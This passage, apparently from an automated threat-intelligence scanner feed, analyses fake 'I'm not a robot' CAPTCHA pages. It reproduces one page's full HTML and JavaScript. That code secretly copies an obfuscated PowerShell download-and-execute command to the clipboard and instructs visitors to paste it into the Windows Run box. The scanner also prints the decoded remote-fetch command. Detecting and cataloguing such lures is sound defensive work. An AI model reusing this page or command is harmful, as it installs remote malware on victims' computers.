.recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.bratusferramentas.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.bratusferramentas.grupomoltz.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://ningbocrm.jintsume.net/
Total findings: 8
Indicators of Compromise
Suspicious Patterns
Suspicious Keywords
PowerShell Downloads
Malicious Code Sample
...' + 's?t=6809a40d&token=' + encodeURI(token), true); xhr.send(); }; ls(new XMLHttpRequest(), scriptPath, 'c8294e00fbb336010...
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://ningbocrm.jintsume.net/",
"Base64Strings": [
{
"Base64": "PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==",
"Decoded": "<svg fill='#D7D7D7' style=\"float: right\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" viewBox=\"0 0 24 24\" width=\"24\"><path d=\"M0 0h24v24H0z\" fill=\"none\"/><path d=\"M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z\"/></svg>"
},
{
"Base64": "CXtycX03MzYwYWU1Njk5NTk3MWFhMzJjYTZlMjc2YzVhYjllNTE0YTJiMzcwM2NmMDc0YTQwZDdlNTYyNDhjZmJmNzA4ODA2NWIwMjgwZjA2OTFmMGNiMTk0NzFhNjE5ZWUzMTMxYzUwZDI0Y2Q2ZDdhZTlmMzVkMjIyMjEzZGQ1MGE4MzJmZDYyMzRiZWUwYWY5ZTRiNmYwMTY2YjliMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRi",
"Decoded": "\t{rq}7360ae56995971aa32ca6e276c5ab9e514a2b3703cf074a40d7e56248cfbf7088065b0280f0691f0cb19471a619ee3131c50d24cd6d7ae9f35d222213dd50a832fd6234bee0af9e4b6f0166b9b1ee7ba2628792e28e183e3e42e83c29041db"
},
{
"Base64": "MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMzNw==",
"Decoded": "1745462285.7422:8ae413d6ec5bb7ecefe91b2519b94287c59819f155e6e9cc3acce9128dfee8c2:6809a40db5337"
},
{
"Base64": "eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2",
"Decoded": "{\"alg\":\"A128KW\",\"enc\":\"A128CBC-HS256"
},
{
"Base64": "ZGU3NDM5ZGMxNmJhNzcwNjA5MDIzYWY3OTk3MWM2YzkxNzRkOTEzYSw2ODA5YTQwZGJiYTQx",
"Decoded": "de7439dc16ba770609023af79971c6c9174d913a,6809a40dbba41"
},
{
"Base64": "eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2",
"Decoded": "{\"alg\":\"A128KW\",\"enc\":\"A128CBC-HS256"
},
{
"Base64": "MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMz",
"Decoded": "1745462285.7422:8ae413d6ec5bb7ecefe91b2519b94287c59819f155e6e9cc3acce9128dfee8c2:6809a40db533"
},
{
"Base64": "eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2",
"Decoded": "{\"alg\":\"A128KW\",\"enc\":\"A128CBC-HS256"
}
],
"URLs": [
"http://www.w3.org/1999/xhtml",
"https://www.networksolutions.com/promotions/ref/REPOINT-DPRD.html?dom=jintsume.net",
